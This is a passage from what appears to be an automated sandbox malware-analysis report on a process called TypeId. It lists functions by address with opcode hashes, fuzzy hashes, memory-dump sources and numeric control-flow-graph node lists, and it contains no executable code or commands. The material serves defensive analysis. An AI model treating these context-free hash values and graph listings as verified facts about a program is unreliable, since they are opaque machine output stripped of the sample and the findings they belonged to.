                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1107229e74c92d8261521cea1c46d757a528167c701e29668b3ede2f272c4525
                                                                                                  • Instruction ID: 3d05b72bb60680d9829e207f6862c428661fcffbb1747232c190e627ef38d0af
                                                                                                  • Opcode Fuzzy Hash: 1107229e74c92d8261521cea1c46d757a528167c701e29668b3ede2f272c4525
                                                                                                  • Instruction Fuzzy Hash: 8BE0C031F04744E7C7206339DC199DBBBA4CB89221F40C079ED48A33A1DE508801C2D3
                                                                                                  Function 00A7F6E8 Relevance: .0, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 832249a6c77106f87581bd74e9b0f7e62f44ea7069c3ecada6c22b357ae2ee6a
                                                                                                  • Instruction ID: 9e98c83057d3da377e5912c34785e19a3c7b9b1b7ac3ecbea3ce628c0b04b53f
                                                                                                  • Opcode Fuzzy Hash: 832249a6c77106f87581bd74e9b0f7e62f44ea7069c3ecada6c22b357ae2ee6a
                                                                                                  • Instruction Fuzzy Hash: 10F0A574D05208EFCB44DFA8D944AACBBF5FB48310F10C0AAE81997350D6359A51DF45
                                                                                                  Function 06A35AF8 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8ca4a16c94a6b53aeb234f7fbc4253e5e437083b2ef4d659e778443d9521e115
                                                                                                  • Instruction ID: 72f2f8803d5bd0e39d32ec93b373d9c029ec7ed627b860aa4ed950a6d4a6cd87
                                                                                                  • Opcode Fuzzy Hash: 8ca4a16c94a6b53aeb234f7fbc4253e5e437083b2ef4d659e778443d9521e115
                                                                                                  • Instruction Fuzzy Hash: E7E0C974E05208EFCB84EFA8D544AACBBF4EB48310F10C0AAA85997351D6359A51DF85
                                                                                                  Function 06A3A258 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8ca4a16c94a6b53aeb234f7fbc4253e5e437083b2ef4d659e778443d9521e115
                                                                                                  • Instruction ID: bd555cb84b97e0ecdf388f61a1ff339cb543d008dc63a8fe28368725ee846429
                                                                                                  • Opcode Fuzzy Hash: 8ca4a16c94a6b53aeb234f7fbc4253e5e437083b2ef4d659e778443d9521e115
                                                                                                  • Instruction Fuzzy Hash: 6BE06DB4D05218EFCB84EFA8C5406ACFBF4EB48310F10C0EAE84893311D6329A01DF84
                                                                                                  Function 06A3F5B8 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8438e3f01ba335eb8ce945e71ddefd1359c052e32315f6897c17184829ab068d
                                                                                                  • Instruction ID: 4d35edc2fcc7dee47b7c726da5705122d9af41290255b36af5c69d2a74edc04f
                                                                                                  • Opcode Fuzzy Hash: 8438e3f01ba335eb8ce945e71ddefd1359c052e32315f6897c17184829ab068d
                                                                                                  • Instruction Fuzzy Hash: A8E0ED74D06208EFCB84EFA8D5446ACBBF4EB48304F10C0A9E81893341D6359A01CF45
                                                                                                  Function 06A3EFF8 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8438e3f01ba335eb8ce945e71ddefd1359c052e32315f6897c17184829ab068d
                                                                                                  • Instruction ID: 6fa5cdeeb00dcf08ba27086c433861956118f74cc30b8e7d369a5f92600a87ea
                                                                                                  • Opcode Fuzzy Hash: 8438e3f01ba335eb8ce945e71ddefd1359c052e32315f6897c17184829ab068d
                                                                                                  • Instruction Fuzzy Hash: 57E0E574E05208EFCB84EFA8D5446ACBBF4EB49304F10C0AAD818A3340E6359E02DF85
                                                                                                  Function 06A39F68 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8438e3f01ba335eb8ce945e71ddefd1359c052e32315f6897c17184829ab068d
                                                                                                  • Instruction ID: 0acded991dbb29d36bd8d31de616b4f6f74f081cf1ecf463961ed8b6a89ee379
                                                                                                  • Opcode Fuzzy Hash: 8438e3f01ba335eb8ce945e71ddefd1359c052e32315f6897c17184829ab068d
                                                                                                  • Instruction Fuzzy Hash: 47E0ED74D09218EFCB84EFA8D5446ADBBF4EB88304F10C1A9E81893340D6759A01CF85
                                                                                                  Function 06A38808 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c1309577cbde5073c630cfae32952f84c0d97f4f43aba5339fcbe8171f7f16cf
                                                                                                  • Instruction ID: 52f2b367c94f160093b7f9c19fa4ce0c0ece9c532073042f2120600c77252489
                                                                                                  • Opcode Fuzzy Hash: c1309577cbde5073c630cfae32952f84c0d97f4f43aba5339fcbe8171f7f16cf
                                                                                                  • Instruction Fuzzy Hash: A0E01A74D09218EFCB44EFA8E5405ACFBB4AB48204F10C0EAE85857341C6355A01DB85
                                                                                                  Function 06A39D60 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 982758fc86689068bfbcfabaa2a5ef19779ed4ff70c589375c4b4c88d23d030e
                                                                                                  • Instruction ID: d6c23550951bebc7ef9959a31146b6c6d304633e647fe44af7fa164ae9591b17
                                                                                                  • Opcode Fuzzy Hash: 982758fc86689068bfbcfabaa2a5ef19779ed4ff70c589375c4b4c88d23d030e
                                                                                                  • Instruction Fuzzy Hash: ADE08C74909208EBCB04EFA4D9419ADBBB4EB49310F10C0A9EC4927350D6729E52DB89
                                                                                                  Function 06A3DC80 Relevance: .0, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09575694a43bf574f2baf86021e8f4e0f8472fae625b3b8e9885c2a97cb9f0b3
                                                                                                  • Instruction ID: 1ff726168e2caa9074c46bd1a6c893b2b299a9b5d2b4c17220e3e0fc0bf88554
                                                                                                  • Opcode Fuzzy Hash: 09575694a43bf574f2baf86021e8f4e0f8472fae625b3b8e9885c2a97cb9f0b3
                                                                                                  • Instruction Fuzzy Hash: F0E0C234909208DBCB04FFA4D9445ACBBB4EF45304F10C0D9D80827340C6716E02CB85
                                                                                                  Function 06A3B028 Relevance: .0, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: caa890d2c7701d2e5a8269fdccd70eb3d78fc8c2cd34fd515722772c8022e109
                                                                                                  • Instruction ID: 4ce15509680550596683da48c5ee4714e5974b00b802c4de5fe86440a8b938e3
                                                                                                  • Opcode Fuzzy Hash: caa890d2c7701d2e5a8269fdccd70eb3d78fc8c2cd34fd515722772c8022e109
                                                                                                  • Instruction Fuzzy Hash: 4AE0C2B18022089BC740FFF48A0969E77F89B49201F1088E5E00893110EA714F00D796
                                                                                                  Function 00A7E6C0 Relevance: .0, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bbf810188ab3d71d9427714cc61f3e5eef73a0ec104669043578ded785b63752
                                                                                                  • Instruction ID: ea492811e73abe4c64bb06266cf1044529d03bab197ab6169e802d5a472116ea
                                                                                                  • Opcode Fuzzy Hash: bbf810188ab3d71d9427714cc61f3e5eef73a0ec104669043578ded785b63752
                                                                                                  • Instruction Fuzzy Hash: 0EE0EC71905208DBCB00EFE4990569E7BB8EB49205F4085A6D54993150EA715E10DB96
                                                                                                  Function 00A7082D Relevance: .0, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a21b1a762a5227eb27951340fedcfb7c836e838530d0559e3bb436d08448e92
                                                                                                  • Instruction ID: 68fb35b502920d0215ae24729d99babebb8fb8d7395bcc9ab70cdee3d6320c20
                                                                                                  • Opcode Fuzzy Hash: 5a21b1a762a5227eb27951340fedcfb7c836e838530d0559e3bb436d08448e92
                                                                                                  • Instruction Fuzzy Hash: 86D0126191E3D48FDB1347705D385497F304E93154B0AC4CBD0E4C70A3D1580906C733
                                                                                                  Function 00A7E530 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aab29ce3bd333150c3eb1a768d606fe83f50c252460adc55d54922f75f4ec035
                                                                                                  • Instruction ID: 79b17be1099458b1dc90e70f1b6de02ac6b0d14aea5ad4040fa465b0411b38f2
                                                                                                  • Opcode Fuzzy Hash: aab29ce3bd333150c3eb1a768d606fe83f50c252460adc55d54922f75f4ec035
                                                                                                  • Instruction Fuzzy Hash: 9DC08C70082B0886C268B7E4AE0A36876981B8930BF00C050E08C008520EF44850C26F

                                                                                                  Non-executed Functions

                                                                                                  Function 00A70588 Relevance: 7.6, Strings: 6, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: p$p$p$p$p$p
                                                                                                  • API String ID: 0-222779563
                                                                                                  • Opcode ID: 55d2c12235372901e6e1aaaed58da875fd0b99970cc98c2438dd6872d13f40b5
                                                                                                  • Instruction ID: e9ddba7899a4953ba0f7d983e9683522b4419a38706808004b5b3965c17e744a
                                                                                                  • Opcode Fuzzy Hash: 55d2c12235372901e6e1aaaed58da875fd0b99970cc98c2438dd6872d13f40b5
                                                                                                  • Instruction Fuzzy Hash: EC314D9280E3C29FD30397345869A957F759F63294B1A81DBC8C8DF0A3E519181EC7A6
                                                                                                  Function 06A3A2A8 Relevance: 6.3, Strings: 5, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2585199440.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6a20000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ocq$(ocq$(ocq$-$\scq
                                                                                                  • API String ID: 0-4261760854
                                                                                                  • Opcode ID: 2f18c9ea5b9fa982256c6ebcc21910645068b8eb763c0a3ed16e00a3dbd8fc6b
                                                                                                  • Instruction ID: c30a7ad480d51e7ffb38b1fbd0cca0d48fe36994bfd79f8a410c96ec1004d7e8
                                                                                                  • Opcode Fuzzy Hash: 2f18c9ea5b9fa982256c6ebcc21910645068b8eb763c0a3ed16e00a3dbd8fc6b
                                                                                                  • Instruction Fuzzy Hash: 9F311874E04278CFDB64DF59C8447EEB7B6BB89300F0081AAE559A7294DB705E84CF92
                                                                                                  Function 00A7AFAE Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$'$+$,
                                                                                                  • API String ID: 0-111508417
                                                                                                  • Opcode ID: ab11bb5a49b28518542699220d151d02c6f234c7b495637e30a7920c394400e8
                                                                                                  • Instruction ID: 3f3ff7c8b37476fed354a7ae40c7f7f56714bb9e3934760b75ed8c183fc43138
                                                                                                  • Opcode Fuzzy Hash: ab11bb5a49b28518542699220d151d02c6f234c7b495637e30a7920c394400e8
                                                                                                  • Instruction Fuzzy Hash: 9F516774901229DFEB64DF29D889BDDBBB1BB49304F1081EAE84DA2280CB705E85CF41
                                                                                                  Function 00A7B2D0 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $&$,$-
                                                                                                  • API String ID: 0-710754648
                                                                                                  • Opcode ID: 8a10fe3b6fff32636b7134dee6902e268f2b5bd8dba27b1d79631f1630180f65
                                                                                                  • Instruction ID: 4cc37952959a62307acdfbb03e70c6c01d6242d25974abded5bcf5c085989676
                                                                                                  • Opcode Fuzzy Hash: 8a10fe3b6fff32636b7134dee6902e268f2b5bd8dba27b1d79631f1630180f65
                                                                                                  • Instruction Fuzzy Hash: AD415774915229DFEB70DF29D889BDDBBB1BB59304F1081EAE84DA2280CB701E85CF41
                                                                                                  Function 00A7B26E Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2547008556.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_a70000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $&$,$-
                                                                                                  • API String ID: 0-710754648
                                                                                                  • Opcode ID: 46ad0e49748587b8d619d845258894ba059c52baf1061ad4ac821e2cf5d71e77
                                                                                                  • Instruction ID: 1fe07a4d1251e6ba8b53946bd1116421cb3da589f3f908f0882467092561bc8c
                                                                                                  • Opcode Fuzzy Hash: 46ad0e49748587b8d619d845258894ba059c52baf1061ad4ac821e2cf5d71e77
                                                                                                  • Instruction Fuzzy Hash: E6415874915229DFEB60DF29D889BDDBAB1BB59304F1081EAE84DA2280CB701E85CF41

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.4%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:17
                                                                                                  Total number of Limit Nodes:3
                                                                                                  execution_graph 11300 6c93648 11302 6c936ad 11300->11302 11303 6c936fa 11302->11303 11304 6c9259c 11302->11304 11305 6c94340 DispatchMessageW 11304->11305 11306 6c943ac 11305->11306 11306->11302 11307 6c930b0 11308 6c933b8 11307->11308 11309 6c930d8 11307->11309 11310 6c930e1 11309->11310 11313 6c924d4 11309->11313 11312 6c93104 11314 6c924df 11313->11314 11316 6c933fb 11314->11316 11317 6c924f0 11314->11317 11316->11312 11318 6c93430 OleInitialize 11317->11318 11319 6c93494 11318->11319 11319->11316

                                                                                                  Executed Functions

                                                                                                  Function 00E94338 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 126 e94338-e94360 127 e94362 126->127 128 e94367-e943a9 126->128 127->128 129 e943af-e9442a call e97c52 128->129 130 e94430-e94437 128->130 129->130 131 e9443d-e944c2 130->131 132 e945e0-e9462b 130->132 157 e944c8-e94544 131->157 158 e945da 131->158 143 e9462d-e94646 132->143 144 e94680-e94747 call e94058 132->144 143->144 151 e94648-e9467b 143->151 159 e94766-e9476c 144->159 151->159 174 e945a3-e945ac 157->174 158->132 161 e9476e 159->161 162 e94776 159->162 161->162 165 e94777 162->165 165->165 175 e945ae-e945b2 174->175 176 e94546-e9454f 174->176 175->158 178 e945b4-e945cf 175->178 179 e94551 176->179 180 e94556-e9458e 176->180 178->158 179->180 186 e945a0 180->186 187 e94590-e9459e 180->187 186->174 187->175
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$Djq
                                                                                                  • API String ID: 0-2038950263
                                                                                                  • Opcode ID: b94063dc9f9bb00cb3de6a589d0f80c060769ea2663a30db2cc514b72d83c7f0
                                                                                                  • Instruction ID: 696771390df48c07ddbcf732e74addb7c846137f8b1d90b09f99ca6161acdf3c
                                                                                                  • Opcode Fuzzy Hash: b94063dc9f9bb00cb3de6a589d0f80c060769ea2663a30db2cc514b72d83c7f0
                                                                                                  • Instruction Fuzzy Hash: 67D1C3B4E00218CFDB54DFA9D994A9DBBF2BF89300F1091A9D409AB365DB719D85CF40
                                                                                                  Function 00E94329 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 260 e94329-e94360 261 e94362 260->261 262 e94367-e943a9 260->262 261->262 263 e943af-e9442a call e97c52 262->263 264 e94430-e94437 262->264 263->264 265 e9443d-e944c2 264->265 266 e945e0-e9462b 264->266 291 e944c8-e94544 265->291 292 e945da 265->292 277 e9462d-e94646 266->277 278 e94680-e94747 call e94058 266->278 277->278 285 e94648-e9467b 277->285 293 e94766-e9476c 278->293 285->293 308 e945a3-e945ac 291->308 292->266 295 e9476e 293->295 296 e94776 293->296 295->296 299 e94777 296->299 299->299 309 e945ae-e945b2 308->309 310 e94546-e9454f 308->310 309->292 312 e945b4-e945cf 309->312 313 e94551 310->313 314 e94556-e9458e 310->314 312->292 313->314 320 e945a0 314->320 321 e94590-e9459e 314->321 320->308 321->309
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Djq
                                                                                                  • API String ID: 0-3204991199
                                                                                                  • Opcode ID: de7e0e6448b31cb1669e7b69188c218d70da980df11b940e22c232062d824a50
                                                                                                  • Instruction ID: 3d37933b200540a6fa21582bcd40aaffe9cbe74fea5b1d7fb8a9e6b14cecf137
                                                                                                  • Opcode Fuzzy Hash: de7e0e6448b31cb1669e7b69188c218d70da980df11b940e22c232062d824a50
                                                                                                  • Instruction Fuzzy Hash: 75A1C2B4E00218CFDB54DF69D994A9DBBF2BF89300F1091A9D409AB365DB70AD85CF50
                                                                                                  Function 00E938AE Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d70d971c98a59107d925cd1596a340dc41304d9291868044e18162205eebc58a
                                                                                                  • Instruction ID: fded1fca4d6f9341d286ae447434ccf63639c08c3d1aded29025a8a026472adb
                                                                                                  • Opcode Fuzzy Hash: d70d971c98a59107d925cd1596a340dc41304d9291868044e18162205eebc58a
                                                                                                  • Instruction Fuzzy Hash: 37519478E00218CFDB54DF69D958B9EBBB1BB49301F2085AAD80AE7355DB309A85CF01
                                                                                                  Function 00E9E201 Relevance: 6.5, Strings: 5, Instructions: 260COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 e9e201-e9e23e 3 e9e250-e9e256 0->3 4 e9e240-e9e248 0->4 5 e9e258 3->5 6 e9e25f-e9e260 3->6 4->3 5->6 7 e9e38a-e9e3c4 5->7 8 e9e36c-e9e377 5->8 9 e9e621-e9e640 5->9 10 e9e3e3-e9e41a 5->10 11 e9e5a2-e9e5a3 5->11 12 e9e4e2-e9e4e6 5->12 13 e9e265-e9e279 5->13 14 e9e424-e9e43d 5->14 15 e9e339-e9e35b 5->15 16 e9e4f9-e9e521 5->16 17 e9e558-e9e586 5->17 18 e9e27b-e9e2d7 call e94338 5->18 19 e9e2dc-e9e2fe call e94338 call e9cec0 5->19 20 e9e49f 5->20 21 e9e4df-e9e4e0 5->21 22 e9e592 5->22 23 e9e555-e9e556 5->23 24 e9e5f6-e9e615 5->24 6->15 45 e9e3ce-e9e3d4 7->45 47 e9e3c6-e9e3cc 7->47 46 e9e37d-e9e385 8->46 31 e9e642-e9e64a 9->31 32 e9e5e4-e9e5ea 9->32 10->45 50 e9e41c-e9e422 10->50 28 e9e680-e9e688 11->28 12->14 34 e9e4ec-e9e4f4 12->34 26 e9e24a-e9e24d 13->26 51 e9e43f-e9e44b 14->51 52 e9e467 14->52 15->3 33 e9e361-e9e367 15->33 16->17 58 e9e523-e9e539 16->58 67 e9e543-e9e549 17->67 68 e9e588-e9e590 17->68 18->26 64 e9e303-e9e334 19->64 30 e9e4a0-e9e4cc 20->30 21->30 25 e9e593 22->25 23->25 24->32 55 e9e617-e9e61f 24->55 25->11 26->3 30->45 65 e9e4d2-e9e4da 30->65 31->32 41 e9e5ec 32->41 42 e9e5f3-e9e5f4 32->42 33->3 34->45 41->9 41->24 41->42 53 e9e64c-e9e651 41->53 42->9 48 e9e3dd-e9e3de 45->48 49 e9e3d6 45->49 46->26 47->45 48->20 49->9 49->10 49->12 49->14 49->16 49->17 49->20 49->21 49->22 49->23 49->24 49->48 49->53 50->45 60 e9e44d-e9e453 51->60 61 e9e455-e9e45b 51->61 63 e9e46d-e9e48c 52->63 53->28 55->32 66 e9e53b-e9e541 58->66 58->67 69 e9e465 60->69 61->69 63->45 70 e9e492-e9e49a 63->70 64->3 65->45 66->67 72 e9e54b 67->72 73 e9e552-e9e553 67->73 68->67 69->63 70->45 72->9 72->17 72->22 72->23 72->24 72->53 72->73 73->17
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                                                                                  • API String ID: 0-3391486992
                                                                                                  • Opcode ID: 9209ad61904923c9a821de0189b775155f11c266e13fb28c2513d3dba831b4d7
                                                                                                  • Instruction ID: efa3e0b141d0c89ff35ae77759e8063447294252968a6674f52f99838b81e6bc
                                                                                                  • Opcode Fuzzy Hash: 9209ad61904923c9a821de0189b775155f11c266e13fb28c2513d3dba831b4d7
                                                                                                  • Instruction Fuzzy Hash: 8AC1C1B4A04218CFDF64CF69C984BADBBF1BB49304F21A0A9D509B7361E7749985CF11
                                                                                                  Function 00E9B7A0 Relevance: 5.1, Strings: 4, Instructions: 137COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
